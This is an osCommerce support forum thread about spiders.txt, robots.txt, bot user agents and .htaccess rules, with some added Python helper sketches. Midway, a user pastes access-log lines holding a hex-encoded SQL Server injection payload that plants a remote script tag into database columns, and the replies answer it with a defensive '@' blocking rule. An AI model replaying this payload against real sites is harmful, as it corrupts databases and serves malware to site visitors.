stevel

Updated spiders.txt Official Support Topic


Copy the text below into Notepad:

 

User-agent: *
Disallow: /store/catalog/account.php
Disallow: /store/catalog/account_edit.php
Disallow: /store/catalog/account_history.php
Disallow: /store/catalog/account_history_info.php
Disallow: /store/catalog/account_password.php
Disallow: /store/catalog/address_book.php
Disallow: /store/catalog/address_book_process.php
Disallow: /store/catalog/advanced_search.php
Disallow: /store/catalog/checkout_confirmation.php
Disallow: /store/catalog/checkout_payment.php
Disallow: /store/catalog/checkout_payment_address.php
Disallow: /store/catalog/checkout_process.php
Disallow: /store/catalog/checkout_shipping.php
Disallow: /store/catalog/checkout_shipping_address.php
Disallow: /store/catalog/checkout_success.php
Disallow: /store/catalog/cookie_usage.php
Disallow: /store/catalog/create_account.php
Disallow: /store/catalog/create_account_success.php
Disallow: /store/catalog/login.php
Disallow: /store/catalog/password_forgotten.php
Disallow: /store/catalog/popup_image.php
Disallow: /store/catalog/shopping_cart.php
Disallow: /store/catalog/product_reviews_write.php

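Save it as robots.txt.

Upload it to the root folder (/) of your site. The Disallow paths above assume the store is installed in /store/catalog/, so change them to match your own installation.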
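Before uploading, you can check that the rules block what you expect with Python's standard urllib.robotparser module. This is a minimal sketch that assumes the store lives under /store/catalog/ as in the file above; example.com is a placeholder domain, and only a few of the Disallow lines are copied in.

```python
from urllib.robotparser import RobotFileParser

# A few of the rules above; assumes the store is installed under /store/catalog/.
ROBOTS_TXT = """\
User-agent: *
Disallow: /store/catalog/checkout_shipping.php
Disallow: /store/catalog/login.php
Disallow: /store/catalog/shopping_cart.php
"""


def build_parser(robots_text):
    """Parse robots.txt text directly, without fetching it over the network."""
    parser = RobotFileParser()
    parser.parse(robots_text.splitlines())
    return parser


if __name__ == "__main__":
    rp = build_parser(ROBOTS_TXT)
    for path in ("/store/catalog/login.php", "/store/catalog/index.php"):
        # example.com is a placeholder; only the path matters for this check.
        url = "http://example.com" + path
        print(path, "allowed" if rp.can_fetch("Googlebot", url) else "blocked")
```

Paste in your full robots.txt text to check every page; can_fetch() returns False for any URL that a Disallow line covers.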


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

"Headers already sent" - The definitive help

"Cannot redeclare ..." - How to find/fix it

SSL Implementation Help


Yahoo should not be getting a session ID as "slurp" is in the spiders.txt file. What evidence do you have that it is getting a new ID? Note that if you allowed Yahoo to index your site before enabling "prevent spider sessions", it may have saved a session ID at that time. While it won't get a new one, it can keep reusing the old one.

 

The advice on adding pages to robots.txt is good.
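One way to gather that evidence is to pull the osCsid values out of Yahoo's requests in your access log. This is a minimal sketch, assuming Apache's combined log format and that the session ID shows up in the URL as osCsid=...; the sample lines in any test are made up. If only one ID keeps recurring, that fits the "saved old ID" explanation; many distinct IDs would suggest new sessions are being started.

```python
import re
from collections import Counter

# Apache "combined" format: ... "GET /path?query HTTP/1.1" status bytes "referer" "user agent"
LOG_RE = re.compile(
    r'"(?:GET|POST|HEAD) (?P<url>\S+) HTTP/[\d.]+" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Same character class as the osCsid rewrite rules used with osCommerce.
SID_RE = re.compile(r"[?&]osCsid=([0-9a-z]+)", re.IGNORECASE)


def session_ids_for(lines, ua_fragment="slurp"):
    """Count osCsid values in requests whose user agent contains ua_fragment."""
    counts = Counter()
    for line in lines:
        m = LOG_RE.search(line)
        if not m or ua_fragment not in m.group("ua").lower():
            continue
        sid = SID_RE.search(m.group("url"))
        if sid:
            counts[sid.group(1)] += 1
    return counts
```

For example, session_ids_for(open("access_log")).most_common() lists each ID Yahoo used and how often.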

Have you tried to disallow that page in your "robots.txt" file?

:unsure:

 

 

Thanks for your help

:)


I have some suspicious activity going on on my website; it must be a script. It changes its IP address very frequently. I tried to block the IPs, but there is no way to block all of them. Here is what I have in my access_log:

 

76.108.90.33 - - [16/Aug/2008:02:50:53 -0600] "GET /product_info.php?pName=product';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172
283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F5220736
56C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973
636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970
653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204
645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320
5748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617
465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F74
69746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F637
37273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E
6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2
F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27
2727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542
C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4341544520546162
6C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 8973 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705)"

69.113.44.135 - - [16/Aug/2008:06:27:55 -0600] "GET /?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172
283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F5220736
56C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973
636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970
653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204
645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320
5748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617
465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F74
69746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F637
37273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E
6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2
F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27
2727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542
C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4341544520546162
6C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 25376 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 1.41.1 ; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"

69.113.44.135 - - [16/Aug/2008:06:29:37 -0600] "GET /?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172
283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F5220736
56C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973
636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970
653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204
645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320
5748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617
465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F74
69746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F637
37273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E
6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2
F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27
2727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542
C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4341544520546162
6C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 7745 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 1.41.1 ; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"

69.113.44.135 - - [16/Aug/2008:06:29:38 -0600] "GET /index.php?cPath=22_23';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172
283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F5220736
56C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973
636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970
653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204
645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320
5748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617
465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F74
69746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F637
37273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E
6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2
F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27
2727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542
C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4341544520546162
6C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 8142 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 1.41.1 ; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"

 

Is there anything I can do to block these activities?


This is an attempt to attack your site using an SQL injection technique. One possible defense is to write a .htaccess rule that fails the request if the GET parameters include an "@" character - I don't think this would occur in a normal request. spiders.txt isn't going to help you here.
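If you want to see what these requests actually try to do, the hex literal inside CAST(0x... AS CHAR(4000)) is plain ASCII text. The minimal Python sketch below decodes it; PAYLOAD_HEX is only the first chunk copied from the log above, and pasting in the whole literal decodes the full statement. Decoded in full, it is a T-SQL loop over the sysobjects and syscolumns tables (that is, it targets Microsoft SQL Server) that appends a <script> tag to the text columns it finds.

```python
# First chunk of the 0x... literal from the logged requests above.
PAYLOAD_HEX = "4445434C415245204054207661726368617228323535292C40432076617263686172"


def decode_cast_payload(hex_string):
    """Decode the hex literal the attack passes to CAST(... AS CHAR(4000))."""
    cleaned = "".join(hex_string.split())  # tolerate line breaks from copy/paste
    if cleaned.lower().startswith("0x"):
        cleaned = cleaned[2:]
    return bytes.fromhex(cleaned).decode("ascii")


print(decode_cast_payload(PAYLOAD_HEX))
```

The leading characters decode to the start of a DECLARE statement, which is why the @ test discussed here catches these requests: the injected T-SQL needs @ for its variables.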


Steve, can you please help me write a .htaccess rule? So far I have the following in my .htaccess:

# $Id: .htaccess,v 1.3 2003/06/12 10:53:20 hpdl Exp $

# Set some options
Options -Indexes
Options FollowSymLinks

RewriteEngine on
RewriteBase /
#
# Skip the next two rewriterules if NOT a spider
RewriteCond %{HTTP_USER_AGENT} !(msnbot|slurp|googlebot) [NC]
RewriteRule .* - [s=2]
#
# case: leading and trailing parameters
RewriteCond %{QUERY_STRING} ^(.+)&osCsid=[0-9a-z]+&(.+)$ [NC]
RewriteRule (.*) $1?%1&%2 [R=301,L]
#
# case: leading-only, trailing-only or no additional parameters
RewriteCond %{QUERY_STRING} ^(.+)&osCsid=[0-9a-z]+$|^osCsid=[0-9a-z]+&?(.*)$ [NC]
RewriteRule (.*) $1?%1 [R=301,L]
#
RewriteCond %{QUERY_STRING} :/ [NC]
RewriteRule ^ - [F]

RedirectMatch 301 /osCommerce/(.*) http://shop.com/$1
RedirectMatch 301 /osCommerce/product_info.php(.*) http://shop.com/product_info.php$1

#
# This is used with Apache WebServers
#
# For this to work, you must include the parameter 'Options' to
# the AllowOverride configuration
#
# Example:
#
# <Directory "/usr/local/apache/htdocs">
# AllowOverride Options
# </Directory>
#
# 'All' will also work. (This configuration is in the
# apache/conf/httpd.conf file)

# The following makes adjustments to the SSL protocol for Internet
# Explorer browsers

<IfModule mod_setenvif.c>
<IfDefine SSL>
SetEnvIf User-Agent ".*MSIE.*" \
nokeepalive ssl-unclean-shutdown \
downgrade-1.0 force-response-1.0
</IfDefine>
</IfModule>

# If Search Engine Friendly URLs do not work, try enabling the
# following Apache configuration parameter
#
# AcceptPathInfo On

# Fix certain PHP values
# (commented out by default to prevent errors occurring on certain
# servers)
#
#<IfModule mod_php4.c>
# php_value session.use_trans_sid 0
# php_value register_globals 1
#</IfModule>

Thanks in advance.
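For anyone puzzling over the two osCsid rules in this file: they only fire for the spider user agents in the first RewriteCond (everyone else skips them via the S=2 rule) and strip the session ID with a 301 redirect. Below is a minimal Python model of just the two query-string rewrites. It is not Apache; it reuses the same regular expressions, with re.IGNORECASE standing in for [NC] and an unmatched group treated as an empty string.

```python
import re
from typing import Optional

# Same patterns as the two RewriteCond lines; re.IGNORECASE stands in for [NC].
BOTH_SIDES = re.compile(r"^(.+)&osCsid=[0-9a-z]+&(.+)$", re.IGNORECASE)
ONE_SIDE = re.compile(r"^(.+)&osCsid=[0-9a-z]+$|^osCsid=[0-9a-z]+&?(.*)$", re.IGNORECASE)


def strip_oscsid(query: str) -> Optional[str]:
    """Return the query string a spider is redirected to, or None if neither rule fires."""
    m = BOTH_SIDES.match(query)
    if m:
        # RewriteRule (.*) $1?%1&%2
        return f"{m.group(1)}&{m.group(2)}"
    m = ONE_SIDE.match(query)
    if m:
        # RewriteRule (.*) $1?%1 -- only group 1 is used; group 2 is ignored
        return m.group(1) or ""
    return None
```

One thing the model shows: for a query like osCsid=abc123&cPath=22, the trailing parameters land in the second capture group, which the second rule never substitutes, so they are dropped. If I am reading the backreference numbering right, Apache behaves the same way, and using %1%2 in that rule's substitution would keep them.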


This should work (I think):

 

RewriteCond %{QUERY_STRING} @ [NC]

RewriteRule ^ - [F]

 

That @ might have to be written as \@

 

I suggest searching your access logs for other occurrences of @ to make sure I have not overlooked a legitimate use of this.
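Following that suggestion, here is a minimal Python sketch that lists requests whose query string contains an @. It assumes Apache's common or combined log format. It also flags %40 (the URL-encoded @) because, as far as I know, %{QUERY_STRING} is matched in its raw, still-encoded form, so an encoded @ would slip past the rule above.

```python
import re

# Request line of an Apache common/combined log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(
    r'"(?:GET|POST|HEAD) (?P<path>[^?" ]*)(?:\?(?P<query>[^" ]*))? HTTP/[\d.]+"'
)


def requests_with_at(lines):
    """Yield (path, query) for requests whose query string contains '@' or '%40'."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m or not m.group("query"):
            continue
        query = m.group("query")
        if "@" in query or "%40" in query.lower():
            yield m.group("path"), query
```

For example, looping over requests_with_at(open("access_log")) and printing each hit shows every request the @ rule would (or, for %40, would not) catch.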


No, I don't see any other occurrences of @ in my access logs except for these attacks. So, is this how I need to modify my .htaccess to include the new rule?

# $Id: .htaccess,v 1.3 2003/06/12 10:53:20 hpdl Exp $

# Set some options
Options -Indexes
Options FollowSymLinks

RewriteEngine on
RewriteBase /
#
# Skip the next two rewriterules if NOT a spider
RewriteCond %{HTTP_USER_AGENT} !(msnbot|slurp|googlebot) [NC]
RewriteRule .* - [S=2]
#
# case: leading and trailing parameters
RewriteCond %{QUERY_STRING} ^(.+)&osCsid=[0-9a-z]+&(.+)$ [NC]
RewriteRule (.*) $1?%1&%2 [R=301,L]
#
# case: leading-only, trailing-only or no additional parameters
RewriteCond %{QUERY_STRING} ^(.+)&osCsid=[0-9a-z]+$|^osCsid=[0-9a-z]+&?(.*)$ [NC]
RewriteRule (.*) $1?%1 [R=301,L]
#
RewriteCond %{QUERY_STRING} :/ [NC]
RewriteRule ^ - [F]
#
RewriteCond %{QUERY_STRING} @ [NC]
RewriteRule ^ - [F]

RedirectMatch 301 /osCommerce/(.*) http://shop.com/$1
RedirectMatch 301 /osCommerce/product_info.php(.*) http://shop.com/product_info.php$1

#
# This is used with Apache WebServers
#
# For this to work, you must include the parameter 'Options' to
# the AllowOverride configuration
#
# Example:
#
# <Directory "/usr/local/apache/htdocs">
# AllowOverride Options
# </Directory>
#
# 'All' will also work. (This configuration is in the
# apache/conf/httpd.conf file)

# The following makes adjustments to the SSL protocol for Internet
# Explorer browsers

<IfModule mod_setenvif.c>
<IfDefine SSL>
SetEnvIf User-Agent ".*MSIE.*" \
nokeepalive ssl-unclean-shutdown \
downgrade-1.0 force-response-1.0
</IfDefine>
</IfModule>

# If Search Engine Friendly URLs do not work, try enabling the
# following Apache configuration parameter
#
# AcceptPathInfo On

# Fix certain PHP values
# (commented out by default to prevent errors occurring on certain
# servers)
#
#<IfModule mod_php4.c>
# php_value session.use_trans_sid 0
# php_value register_globals 1
#</IfModule>

Thanks.


Would this .htaccess file be very specific to one's shop, or could I just copy it and use it for my shop?

Where exactly does it need to go?

Thanks, Steve.

From what I can tell, spiders.txt is not being used on your store. I switched the user agent to Googlebot and it still got a session. I did notice with your store something I have seen with others in that even on the first page, the links don't have a session ID in the URL, indicating that a cookie was set initially. I'd be curious to know how that was done. But in any event, the "prevent spider sessions" code is not running.

 

Would you be so kind as to test again, please? I've made some adjustments.


Absinthe Original Liquor Store
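A rough way to repeat that Googlebot test yourself is to request a page with a Googlebot user agent and look for an osCsid parameter in the links or an osCsid cookie in the response. This is a minimal Python sketch, assuming the session name is osCsid (as in the rewrite rules in this thread). The user-agent string is an example, the URL is a placeholder, and the check is a separate function so it can also be run on saved HTML.

```python
import re
import urllib.request
from typing import List

# Example Googlebot user-agent string; the store only needs "googlebot" somewhere in it.
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
# ';' is included so HTML-escaped links ("&amp;osCsid=") are caught too.
SID_RE = re.compile(r"[?&;]osCsid=[0-9a-z]+", re.IGNORECASE)


def shows_session(html: str, set_cookie_headers: List[str]) -> bool:
    """True if links carry osCsid or the server tried to set an osCsid cookie."""
    if SID_RE.search(html):
        return True
    return any(h.lower().startswith("oscsid=") for h in set_cookie_headers)


def fetch_as_googlebot(url: str) -> bool:
    """Fetch url with the Googlebot user agent and report whether a session appears."""
    req = urllib.request.Request(url, headers={"User-Agent": GOOGLEBOT_UA})
    with urllib.request.urlopen(req, timeout=10) as resp:
        html = resp.read().decode("utf-8", errors="replace")
        cookies = resp.headers.get_all("Set-Cookie") or []
    return shows_session(html, cookies)
```

Calling fetch_as_googlebot("http://www.example.com/index.php") with your own store's URL should return False once "prevent spider sessions" is working.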


Guys, I need help again.

What do I add to my spiders.txt to stop this one?

IP Address: 91.205.124.3
User Agent: Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)


Add "Yanga WorldSearch" to your spiders.txt file. If that doesn't work, then ban the IP address via .htaccess.

 

Vger


Thanks, will try that :)


This did not work.


Thanks for your help. All I had to do was add Yanga (only), not Yanga WorldSearch.

 

:) All you guys are great
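As far as I understand the stock osCommerce 2.2 "prevent spider sessions" check, it lowercases the visitor's user agent and then looks for each non-empty, trimmed line of spiders.txt as a plain substring. If that is right, entries need to be lowercase fragments of the user agent, which would explain why "Yanga WorldSearch" (with capitals) never matched, while "yanga" in lowercase should. The following is a minimal Python model of that check, an illustration rather than the osCommerce PHP code itself.

```python
from typing import Iterable


def is_spider(user_agent: str, spider_entries: Iterable[str]) -> bool:
    """Model of the spiders.txt check: lowercase the user agent, then look for
    each non-empty, trimmed entry as a plain substring. The entries themselves
    are not lowercased, so an entry containing capitals can never match."""
    ua = user_agent.lower()
    for entry in spider_entries:
        entry = entry.strip()
        if entry and entry in ua:
            return True
    return False


UA = "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)"
print(is_spider(UA, ["Yanga WorldSearch"]))  # False: the entry has capitals
print(is_spider(UA, ["yanga"]))              # True
```

Because it is a substring test, keep entries specific enough that they cannot appear in an ordinary browser's user agent.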


Hi Guys,

Today I had a visit from one "computer" which hit my site very often.
I don't know if this is a spider, or whether we need an update here.

Here is the information:
IP address: 82.226.37.240
Client: nor75-3-82-226-37-240.fbx.proxad.net
GeoIP says that it comes from France.

Since I found no further information about them, perhaps some of you know more.

If so, any feedback would be appreciated.

Regards

Andreas


spider5.mail.ru

Name: Guest
ID: 0
IP Address: 195.239.211.234
User Agent: Mail.Ru/1.0

Can this spider be added to the spiders.txt file? If yes, can someone tell me how?

Thanks in advance


I'm new here and I think this is a good idea. I downloaded your contribution, deleted my original spiders.txt file, and uploaded yours along with the spiders-large.txt file. Is this right, and do I have to do anything else?


You use either spiders.txt or spiders-large.txt, not both.

The large one can slow things down, but if you want to use it, rename it to spiders.txt (I think it says this in the instructions anyway).

If you do not have a robots.txt file, you should get one (from the Add-Ons area).


The Coopco Underwear Shop

 

If you live to be 100 years of age, that means you have lived for 36,525 days. Don't waste another, there aren't many left.


Hi, Steve. I just found that this rewrite rule causes a problem with the "Customer Survey" contribution. When I click the survey link in the email (it looks like this: http://store.com/survey.php?&email=val...;order_num=622), I get:

Forbidden

You don't have permission to access /survey.php on this server.

Since an email address contains an @ symbol, the rewrite rule matches and returns a Forbidden page. Can you please help me rewrite the rule so that accessing survey.php doesn't give a Forbidden page? I appreciate your help. Thanks.
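One common mod_rewrite approach is an extra condition on the requested path, for example RewriteCond %{REQUEST_URI} !^/survey\.php$ placed just before the @ condition. RewriteCond lines are ANDed by default, so the 403 would then apply everywhere except survey.php. Below is a minimal Python model of that combined decision, assuming survey.php sits in the site root as in the link above; it only illustrates the logic and is not Apache itself. The trade-off is that survey.php loses this protection, so it has to handle its own input safely.

```python
import re

# Assumption: survey.php lives in the site root, as in the emailed link.
EXEMPT_PATH = re.compile(r"^/survey\.php$")


def is_forbidden(path: str, query: str) -> bool:
    """Model of the combined rule (both conditions must hold for the 403):
    RewriteCond %{REQUEST_URI} !^/survey\.php$
    RewriteCond %{QUERY_STRING} @
    RewriteRule ^ - [F]
    """
    return not EXEMPT_PATH.match(path) and "@" in query
```

With this, a request like /survey.php?&email=someone@example.com passes, while the attack requests on other pages are still refused.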


I'm listed in Google, but only my home page; there are no other pages. It's been about 4 weeks. Is this normal? Also, I deleted my original spiders.txt file and replaced it with the one in the contribution package. Was I meant to do this?

Thanks

Rishi


Post 467, and post 467, and post 467 :angry:

